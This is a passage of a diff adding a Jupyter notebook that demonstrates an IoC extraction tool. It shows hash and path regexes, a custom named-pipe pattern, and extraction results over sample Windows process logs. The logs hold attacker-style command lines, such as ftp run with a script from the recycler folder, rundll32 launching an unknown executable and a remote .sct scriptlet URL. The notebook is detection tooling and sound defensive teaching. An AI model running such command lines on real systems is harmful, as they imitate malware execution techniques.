+      "text/html": [
+       "<b>linux_path</b>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div style=\"margin-left:20px\"><pre>(?P&lt;root&gt;/+||[.]+)\n",
+       "            (?P&lt;folder&gt;/(?:[^\\\\/:*?&lt;&gt;|\\r\\n]+/)*)\n",
+       "            (?P&lt;file&gt;[^/\\0&lt;&gt;|\\r\\n ]+)</pre></div>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<b>md5_hash</b>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div style=\"margin-left:20px\"><pre>(?:^|[^A-Fa-f0-9])(?P&lt;hash&gt;[A-Fa-f0-9]{32})(?:$|[^A-Fa-f0-9])</pre></div>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<b>sha1_hash</b>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div style=\"margin-left:20px\"><pre>(?:^|[^A-Fa-f0-9])(?P&lt;hash&gt;[A-Fa-f0-9]{40})(?:$|[^A-Fa-f0-9])</pre></div>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<b>sha256_hash</b>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div style=\"margin-left:20px\"><pre>(?:^|[^A-Fa-f0-9])(?P&lt;hash&gt;[A-Fa-f0-9]{64})(?:$|[^A-Fa-f0-9])</pre></div>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "from html import escape\n",
+    "extractor = IoCExtract()\n",
+    "\n",
+    "for ioc_type, pattern in extractor.ioc_types.items():\n",
+    "    esc_pattern = escape(pattern.comp_regex.pattern.strip())\n",
+    "    display(HTML(f'<b>{ioc_type}</b>'))\n",
+    "    display(HTML(f'<div style=\"margin-left:20px\"><pre>{esc_pattern}</pre></div>'))"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id='addingpatterns'></a>[Contents](#toc)\n",
+    "### Adding your own pattern(s)\n",
+    "Docstring:\n",
+    "```\n",
+    "Add an IoC type and regular expression to use to the built-in set.\n",
+    "\n",
+    "Parameters\n",
+    "----------\n",
+    "ioc_type : str\n",
+    "    A unique name for the IoC type\n",
+    "ioc_regex : str\n",
+    "    A regular expression used to search for the type\n",
+    "priority : int, optional\n",
+    "    Priority of the regex match vs. other ioc_patterns. 0 is\n",
+    "    the highest priority (the default is 0).\n",
+    "group : str, optional\n",
+    "    The regex group to match (the default is None,\n",
+    "    which will match on the whole expression)\n",
+    "\n",
+    "Notes\n",
+    "-----\n",
+    "Pattern priorities.\n",
+    "    If two IocType patterns match on the same substring, the matched\n",
+    "    substring is assigned to the pattern/IocType with the highest\n",
+    "    priority. E.g. `foo.bar.com` will match types: `dns`, `windows_path`\n",
+    "    and `linux_path` but since `dns` has a higher priority, the expression\n",
+    "    is assigned to the `dns` matches.\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 8,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-10T19:52:17.389438Z",
+     "start_time": "2020-02-10T19:52:17.386441Z"
+    }
+   },
+   "outputs": [],
+   "source": [
+    "import re\n",
+    "rcomp = re.compile(r'(?P<pipe>\\\\\\\\\\.\\\\pipe\\\\[^\\s\\\\]+)')"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 9,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-10T19:52:17.436412Z",
+     "start_time": "2020-02-10T19:52:17.390438Z"
+    }
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "IoCPattern(ioc_type='win_named_pipe', comp_regex=re.compile('(?P<pipe>\\\\\\\\\\\\\\\\\\\\.\\\\\\\\pipe\\\\\\\\[^\\\\s\\\\\\\\]+)', re.IGNORECASE|re.MULTILINE|re.VERBOSE), priority=0, group=None)\n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>IoCType</th>\n",
+       "      <th>Observable</th>\n",
+       "      <th>SourceIndex</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>25</th>\n",
+       "      <td>win_named_pipe</td>\n",
+       "      <td>\\\\.\\pipe\\blahtest\"</td>\n",
+       "      <td>107</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "           IoCType          Observable  SourceIndex\n",
+       "25  win_named_pipe  \\\\.\\pipe\\blahtest\"          107"
+      ]
+     },
+     "execution_count": 9,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "extractor.add_ioc_type(ioc_type='win_named_pipe', ioc_regex=r'(?P<pipe>\\\\\\\\\\.\\\\pipe\\\\[^\\s\\\\]+)')\n",
+    "\n",
+    "# Check that it added ok\n",
+    "print(extractor.ioc_types['win_named_pipe'])\n",
+    "\n",
+    "# Use it in our data set\n",
+    "ioc_extractor.extract(data=process_tree, columns=['CommandLine']).query('IoCType == \\'win_named_pipe\\'')"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id='extractmethod'></a>[Contents](#toc)\n",
+    "### extract() method\n",
+    "```\n",
+    "Parameters\n",
+    "----------\n",
+    "src : str, optional\n",
+    "    source string in which to look for IoC patterns\n",
+    "    (the default is None)\n",
+    "data : pd.DataFrame, optional\n",
+    "    input DataFrame from which to read source strings\n",
+    "    (the default is None)\n",
+    "columns : list, optional\n",
+    "    The list of columns to use as source strings,\n",
+    "    if the `data` parameter is used. (the default is None)\n",
+    "\n",
+    "Other Parameters\n",
+    "----------------\n",
+    "ioc_types : list, optional\n",
+    "    Restrict matching to just specified types.\n",
+    "    (default is all types)\n",
+    "include_paths : bool, optional\n",
+    "    Whether to include path matches (which can be noisy)\n",
+    "    (the default is false - excludes 'windows_path'\n",
+    "    and 'linux_path'). If `ioc_types` is specified\n",
+    "    this parameter is ignored.\n",
+    "\n",
+    "Returns\n",
+    "-------\n",
+    "Any\n",
+    "    dict of found observables (if input is a string) or\n",
+    "    DataFrame of observables\n",
+    "\n",
+    "Notes\n",
+    "-----\n",
+    "Extract takes either a string or a pandas DataFrame as input.\n",
+    "When using the string option as an input extract will\n",
+    "return a dictionary of results.\n",
+    "When using a DataFrame the results will be returned as a new\n",
+    "DataFrame with the following columns:\n",
+    "- IoCType: the mnemonic used to distinguish different IoC Types\n",
+    "- Observable: the actual value of the observable\n",
+    "- SourceIndex: the index of the row in the input DataFrame from\n",
+    "which the source for the IoC observable was extracted.\n",
+    "\n",
+    "IoCType Pattern selection\n",
+    "The default list is:  ['ipv4', 'ipv6', 'dns', 'url',\n",
+    "'md5_hash', 'sha1_hash', 'sha256_hash'] plus any\n",
+    "user-defined types.\n",
+    "'windows_path', 'linux_path' are excluded unless `include_paths`\n",
+    "is True or explicitly included in `ioc_paths`.\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 21,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-10T19:55:00.873506Z",
+     "start_time": "2020-02-10T19:55:00.829560Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>IoCType</th>\n",
+       "      <th>Observable</th>\n",
+       "      <th>SourceIndex</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>microsoft.com</td>\n",
+       "      <td>24</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>url</td>\n",
+       "      <td>http://server/file.sct</td>\n",
+       "      <td>31</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>server</td>\n",
+       "      <td>31</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>evil.ps</td>\n",
+       "      <td>35</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>url</td>\n",
+       "      <td>http://somedomain/best-kitten-names-1.jpg'</td>\n",
+       "      <td>37</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>5</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>somedomain</td>\n",
+       "      <td>37</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>6</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>blah.ps</td>\n",
+       "      <td>40</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>7</th>\n",
+       "      <td>md5_hash</td>\n",
+       "      <td>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</td>\n",
+       "      <td>40</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>8</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>blah.ps</td>\n",
+       "      <td>41</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>9</th>\n",
+       "      <td>md5_hash</td>\n",
+       "      <td>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</td>\n",
+       "      <td>41</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "    IoCType                                  Observable  SourceIndex\n",
+       "0       dns                               microsoft.com           24\n",
+       "1       url                      http://server/file.sct           31\n",
+       "2       dns                                      server           31\n",
+       "3       dns                                     evil.ps           35\n",
+       "4       url  http://somedomain/best-kitten-names-1.jpg'           37\n",
+       "5       dns                                  somedomain           37\n",
+       "6       dns                                     blah.ps           40\n",
+       "7  md5_hash            aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa           40\n",
+       "8       dns                                     blah.ps           41\n",
+       "9  md5_hash            aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa           41"
+      ]
+     },
+     "execution_count": 21,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# You can specify multiple columns\n",
+    "ioc_extractor.extract(data=process_tree, columns=['NewProcessName', 'CommandLine']).head(10)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### extract_df()\n",
+    "`extract_df` functions identically to `extract` with a `data` parameter.\n",
+    "It may be more convenient to use this when you know that your\n",
+    "input is a DataFrame"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 23,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-10T19:55:45.753909Z",
+     "start_time": "2020-02-10T19:55:45.712931Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>IoCType</th>\n",
+       "      <th>Observable</th>\n",
+       "      <th>SourceIndex</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>microsoft.com</td>\n",
+       "      <td>24</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>url</td>\n",
+       "      <td>http://server/file.sct</td>\n",
+       "      <td>31</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>server</td>\n",
+       "      <td>31</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>evil.ps</td>\n",
+       "      <td>35</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>url</td>\n",
+       "      <td>http://somedomain/best-kitten-names-1.jpg'</td>\n",
+       "      <td>37</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>5</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>somedomain</td>\n",
+       "      <td>37</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>6</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>blah.ps</td>\n",
+       "      <td>40</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>7</th>\n",
+       "      <td>md5_hash</td>\n",
+       "      <td>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</td>\n",
+       "      <td>40</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>8</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>blah.ps</td>\n",
+       "      <td>41</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>9</th>\n",
+       "      <td>md5_hash</td>\n",
+       "      <td>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</td>\n",
+       "      <td>41</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "    IoCType                                  Observable  SourceIndex\n",
+       "0       dns                               microsoft.com           24\n",
+       "1       url                      http://server/file.sct           31\n",
+       "2       dns                                      server           31\n",
+       "3       dns                                     evil.ps           35\n",
+       "4       url  http://somedomain/best-kitten-names-1.jpg'           37\n",
+       "5       dns                                  somedomain           37\n",
+       "6       dns                                     blah.ps           40\n",
+       "7  md5_hash            aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa           40\n",
+       "8       dns                                     blah.ps           41\n",
+       "9  md5_hash            aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa           41"
+      ]
+     },
+     "execution_count": 23,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "ioc_extractor.extract_df(process_tree, columns=['NewProcessName', 'CommandLine']).head(10)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id='mergeresults'></a>[Contents](#toc)\n",
+    "### SourceIndex column allows you to merge the results with the input DataFrame\n",
+    "Where an input row has multiple IoC matches the output of this merge will result in duplicate rows from the input (one per IoC match). The previous index is preserved in the second column (and in the SourceIndex column).\n",
+    "\n",
+    "Note: you will need to set the type of the SourceIndex column. In the example below case we are matching with the default numeric index so we force the type to be numeric. In cases where you are using an index of a different dtype you will need to convert the SourceIndex (dtype=object) to match the type of your index column."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 11,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-10T19:52:17.482386Z",
+     "start_time": "2020-02-10T19:52:17.451403Z"
+    },
+    "scrolled": true
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>Unnamed: 0</th>\n",
+       "      <th>TenantId</th>\n",
+       "      <th>Account</th>\n",
+       "      <th>EventID</th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>Computer</th>\n",
+       "      <th>SubjectUserSid</th>\n",
+       "      <th>SubjectUserName</th>\n",
+       "      <th>SubjectDomainName</th>\n",
+       "      <th>SubjectLogonId</th>\n",
+       "      <th>NewProcessId</th>\n",
+       "      <th>NewProcessName</th>\n",
+       "      <th>TokenElevationType</th>\n",
+       "      <th>ProcessId</th>\n",
+       "      <th>CommandLine</th>\n",
+       "      <th>ParentProcessName</th>\n",
+       "      <th>TargetLogonId</th>\n",
+       "      <th>SourceComputerId</th>\n",
+       "      <th>TimeCreatedUtc</th>\n",
+       "      <th>NodeRole</th>\n",
+       "      <th>Level</th>\n",
+       "      <th>ProcessId1</th>\n",
+       "      <th>NewProcessId1</th>\n",
+       "      <th>IoCType</th>\n",
+       "      <th>Observable</th>\n",
+       "      <th>SourceIndex</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>0</td>\n",
+       "      <td>802d39e1-9d70-404d-832c-2de5e2478eda</td>\n",
+       "      <td>MSTICAlertsWin1\\MSTICAdmin</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-01-15 05:15:15.677</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-21-996632719-2361334927-4038480536-500</td>\n",
+       "      <td>MSTICAdmin</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>0xfaac27</td>\n",
+       "      <td>0x1580</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\ftp.exe</td>\n",
+       "      <td>%%1936</td>\n",
+       "      <td>0xbc8</td>\n",
+       "      <td>.\\ftp  -s:C:\\RECYCLER\\xxppyy.exe</td>\n",
+       "      <td>C:\\Windows\\System32\\cmd.exe</td>\n",
+       "      <td>0x0</td>\n",
+       "      <td>46fe7078-61bb-4bed-9430-7ac01d91c273</td>\n",
+       "      <td>2019-01-15 05:15:15.677</td>\n",
+       "      <td>source</td>\n",
+       "      <td>0</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>1</td>\n",
+       "      <td>802d39e1-9d70-404d-832c-2de5e2478eda</td>\n",
+       "      <td>MSTICAlertsWin1\\MSTICAdmin</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-01-15 05:15:16.167</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-21-996632719-2361334927-4038480536-500</td>\n",
+       "      <td>MSTICAdmin</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>0xfaac27</td>\n",
+       "      <td>0x16fc</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\reg.exe</td>\n",
+       "      <td>%%1936</td>\n",
+       "      <td>0xbc8</td>\n",
+       "      <td>.\\reg  not /domain:everything that /sid:shines is /krbtgt:golden !</td>\n",
+       "      <td>C:\\Windows\\System32\\cmd.exe</td>\n",
+       "      <td>0x0</td>\n",
+       "      <td>46fe7078-61bb-4bed-9430-7ac01d91c273</td>\n",
+       "      <td>2019-01-15 05:15:16.167</td>\n",
+       "      <td>sibling</td>\n",
+       "      <td>1</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>1</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>2</td>\n",
+       "      <td>802d39e1-9d70-404d-832c-2de5e2478eda</td>\n",
+       "      <td>MSTICAlertsWin1\\MSTICAdmin</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-01-15 05:15:16.277</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-21-996632719-2361334927-4038480536-500</td>\n",
+       "      <td>MSTICAdmin</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>0xfaac27</td>\n",
+       "      <td>0x1700</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\cmd.exe</td>\n",
+       "      <td>%%1936</td>\n",
+       "      <td>0xbc8</td>\n",
+       "      <td>cmd  /c \"systeminfo &amp;&amp; systeminfo\"</td>\n",
+       "      <td>C:\\Windows\\System32\\cmd.exe</td>\n",
+       "      <td>0x0</td>\n",
+       "      <td>46fe7078-61bb-4bed-9430-7ac01d91c273</td>\n",
+       "      <td>2019-01-15 05:15:16.277</td>\n",
+       "      <td>sibling</td>\n",
+       "      <td>1</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>2</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>3</td>\n",
+       "      <td>802d39e1-9d70-404d-832c-2de5e2478eda</td>\n",
+       "      <td>MSTICAlertsWin1\\MSTICAdmin</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-01-15 05:15:16.340</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-21-996632719-2361334927-4038480536-500</td>\n",
+       "      <td>MSTICAdmin</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>0xfaac27</td>\n",
+       "      <td>0x1728</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\rundll32.exe</td>\n",
+       "      <td>%%1936</td>\n",
+       "      <td>0xbc8</td>\n",
+       "      <td>.\\rundll32  /C 42424.exe</td>\n",
+       "      <td>C:\\Windows\\System32\\cmd.exe</td>\n",
+       "      <td>0x0</td>\n",
+       "      <td>46fe7078-61bb-4bed-9430-7ac01d91c273</td>\n",
+       "      <td>2019-01-15 05:15:16.340</td>\n",
+       "      <td>sibling</td>\n",
+       "      <td>1</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>3</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>4</td>\n",
+       "      <td>802d39e1-9d70-404d-832c-2de5e2478eda</td>\n",
+       "      <td>MSTICAlertsWin1\\MSTICAdmin</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-01-15 05:15:16.400</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-21-996632719-2361334927-4038480536-500</td>\n",
+       "      <td>MSTICAdmin</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>0xfaac27</td>\n",
+       "      <td>0x175c</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\rundll32.exe</td>\n",
+       "      <td>%%1936</td>\n",
+       "      <td>0xbc8</td>\n",
+       "      <td>.\\rundll32  /C c:\\users\\MSTICAdmin\\42424.exe</td>\n",
+       "      <td>C:\\Windows\\System32\\cmd.exe</td>\n",
+       "      <td>0x0</td>\n",
+       "      <td>46fe7078-61bb-4bed-9430-7ac01d91c273</td>\n",
+       "      <td>2019-01-15 05:15:16.400</td>\n",
+       "      <td>sibling</td>\n",
+       "      <td>1</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>4</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "   Unnamed: 0                              TenantId  \\\n",
+       "0           0  802d39e1-9d70-404d-832c-2de5e2478eda   \n",
+       "1           1  802d39e1-9d70-404d-832c-2de5e2478eda   \n",
+       "2           2  802d39e1-9d70-404d-832c-2de5e2478eda   \n",
+       "3           3  802d39e1-9d70-404d-832c-2de5e2478eda   \n",
+       "4           4  802d39e1-9d70-404d-832c-2de5e2478eda   \n",
+       "\n",
+       "                      Account  EventID            TimeGenerated  \\\n",
+       "0  MSTICAlertsWin1\\MSTICAdmin     4688  2019-01-15 05:15:15.677   \n",
+       "1  MSTICAlertsWin1\\MSTICAdmin     4688  2019-01-15 05:15:16.167   \n",
+       "2  MSTICAlertsWin1\\MSTICAdmin     4688  2019-01-15 05:15:16.277   \n",
+       "3  MSTICAlertsWin1\\MSTICAdmin     4688  2019-01-15 05:15:16.340   \n",
+       "4  MSTICAlertsWin1\\MSTICAdmin     4688  2019-01-15 05:15:16.400   \n",
+       "\n",
+       "          Computer                                SubjectUserSid  \\\n",
+       "0  MSTICAlertsWin1  S-1-5-21-996632719-2361334927-4038480536-500   \n",
+       "1  MSTICAlertsWin1  S-1-5-21-996632719-2361334927-4038480536-500   \n",
+       "2  MSTICAlertsWin1  S-1-5-21-996632719-2361334927-4038480536-500   \n",
+       "3  MSTICAlertsWin1  S-1-5-21-996632719-2361334927-4038480536-500   \n",
+       "4  MSTICAlertsWin1  S-1-5-21-996632719-2361334927-4038480536-500   \n",
+       "\n",
+       "  SubjectUserName SubjectDomainName SubjectLogonId NewProcessId  \\\n",
+       "0      MSTICAdmin   MSTICAlertsWin1       0xfaac27       0x1580   \n",
+       "1      MSTICAdmin   MSTICAlertsWin1       0xfaac27       0x16fc   \n",
+       "2      MSTICAdmin   MSTICAlertsWin1       0xfaac27       0x1700   \n",
+       "3      MSTICAdmin   MSTICAlertsWin1       0xfaac27       0x1728   \n",
+       "4      MSTICAdmin   MSTICAlertsWin1       0xfaac27       0x175c   \n",
+       "\n",
+       "                        NewProcessName TokenElevationType ProcessId  \\\n",
+       "0       C:\\Diagnostics\\UserTmp\\ftp.exe             %%1936     0xbc8   \n",
+       "1       C:\\Diagnostics\\UserTmp\\reg.exe             %%1936     0xbc8   \n",
+       "2       C:\\Diagnostics\\UserTmp\\cmd.exe             %%1936     0xbc8   \n",
+       "3  C:\\Diagnostics\\UserTmp\\rundll32.exe             %%1936     0xbc8   \n",
+       "4  C:\\Diagnostics\\UserTmp\\rundll32.exe             %%1936     0xbc8   \n",
+       "\n",
+       "                                                          CommandLine  \\\n",
+       "0                                    .\\ftp  -s:C:\\RECYCLER\\xxppyy.exe   \n",
+       "1  .\\reg  not /domain:everything that /sid:shines is /krbtgt:golden !   \n",
+       "2                                  cmd  /c \"systeminfo && systeminfo\"   \n",
+       "3                                            .\\rundll32  /C 42424.exe   \n",
+       "4                        .\\rundll32  /C c:\\users\\MSTICAdmin\\42424.exe   \n",
+       "\n",
+       "             ParentProcessName TargetLogonId  \\\n",
+       "0  C:\\Windows\\System32\\cmd.exe           0x0   \n",
+       "1  C:\\Windows\\System32\\cmd.exe           0x0   \n",
+       "2  C:\\Windows\\System32\\cmd.exe           0x0   \n",
+       "3  C:\\Windows\\System32\\cmd.exe           0x0   \n",
+       "4  C:\\Windows\\System32\\cmd.exe           0x0   \n",
+       "\n",
+       "                       SourceComputerId           TimeCreatedUtc NodeRole  \\\n",
+       "0  46fe7078-61bb-4bed-9430-7ac01d91c273  2019-01-15 05:15:15.677   source   \n",
+       "1  46fe7078-61bb-4bed-9430-7ac01d91c273  2019-01-15 05:15:16.167  sibling   \n",
+       "2  46fe7078-61bb-4bed-9430-7ac01d91c273  2019-01-15 05:15:16.277  sibling   \n",
+       "3  46fe7078-61bb-4bed-9430-7ac01d91c273  2019-01-15 05:15:16.340  sibling   \n",
+       "4  46fe7078-61bb-4bed-9430-7ac01d91c273  2019-01-15 05:15:16.400  sibling   \n",
+       "\n",
+       "   Level  ProcessId1  NewProcessId1 IoCType Observable  SourceIndex  \n",
+       "0      0         NaN            NaN     NaN        NaN            0  \n",
+       "1      1         NaN            NaN     NaN        NaN            1  \n",
+       "2      1         NaN            NaN     NaN        NaN            2  \n",
